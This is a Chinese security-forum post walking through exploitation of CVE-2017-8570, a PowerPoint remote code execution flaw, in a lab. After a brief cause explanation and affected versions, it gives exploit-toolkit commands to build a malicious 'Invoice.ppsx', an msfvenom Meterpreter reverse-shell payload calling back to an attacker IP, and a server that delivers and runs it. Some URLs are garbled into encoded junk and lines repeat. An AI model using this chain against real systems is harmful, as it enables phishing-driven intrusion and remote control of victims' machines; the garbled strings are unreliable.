-
-
[原创]Office远程代码执行漏洞复现与利用(CVE-2017-8570)
-
发表于: 2019-4-13 23:37
-
2.分析环境
操作机:windows7 x64IP:172.16.11.2
目标机:Kali Linux
IP:172.16.12.2
3.漏洞原理
OfficeCVE-2017-85702017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞,利用方法简单。网上公布了利用代码影响范围广泛。该漏洞为Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows script Component)文件。可以欺骗用户运行含有该漏洞的PPT文件导致获取和当前登录用户相同的执行权限。
4.影响版本
Microsoft Office 2007 Service Pack 3Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
5.分析步骤:
1.生成恶意ppsx文件
xshell连接kali主机
在kali下执行如下命令:
cd CVE‐2017‐8570 //进入exploit的目录 python cve‐2017‐8570_toolkit.py ‐M gen ‐w Invoice.ppsx ‐u cbbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3L8r3!0Y4L8#2)9J5k6h3c8G2j5#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6Q4x3V1k6Q4c8e0N6Q4z5e0c8Q4z5f1k6Q4c8e0k6Q4z5o6S2Q4z5e0m8H3M7s2y4^5i4@1f1$3i4K6R3I4i4@1t1$3i4@1f1$3i4K6R3@1i4K6S2r3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3
cd CVE‐2017‐8570 //进入exploit的目录 python cve‐2017‐8570_toolkit.py ‐M gen ‐w Invoice.ppsx ‐u cbbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3L8r3!0Y4L8#2)9J5k6h3c8G2j5#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6Q4x3V1k6Q4c8e0N6Q4z5e0c8Q4z5f1k6Q4c8e0k6Q4z5o6S2Q4z5e0m8H3M7s2y4^5i4@1f1$3i4K6R3I4i4@1t1$3i4@1f1$3i4K6R3@1i4K6S2r3i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3
使用ls命令,可以看到已经成功生成了ppsx格式文件。
接下来将生成的恶意ppsx文件,通过调用powershell下载并执行
msfvenom ‐p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 ‐f exe > /tmp/shell.exe
msfvenom ‐p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 ‐f exe > /tmp/shell.exe
其中 -p 参数是 payload的意思,是使用windows的meterpreter的反弹文件-f参数 指
定输出文件后缀为exe文件再用>重定向输出到tmp目录下
接下来输入如下命令:
定输出文件后缀为exe文件再用>重定向输出到tmp目录下
接下来输入如下命令:
python cve‐2017‐8570_toolkit.py ‐M exp ‐e 3f3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3M7$3S2W2L8r3I4Q4x3X3g2W2P5r3g2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4@1f1J5i4K6R3H3i4K6V1H3L8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6@1L8i4m8Q4x3V1k6K6K9r3g2D9L8q4)9J5k6h3g2^5k6b7`.`.
python cve‐2017‐8570_toolkit.py ‐M exp ‐e 3f3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5$3i4K6u0W2x3e0u0Q4x3X3f1J5i4K6u0r3M7$3S2W2L8r3I4Q4x3X3g2W2P5r3g2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4@1f1J5i4K6R3H3i4K6V1H3L8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6@1L8i4m8Q4x3V1k6K6K9r3g2D9L8q4)9J5k6h3g2^5k6b7`.`.
这段命令是通过脚本在80端口监听,等待接收ppsx请求并下载执行我们的反弹文件
|
|
|---|---|
|
|
|
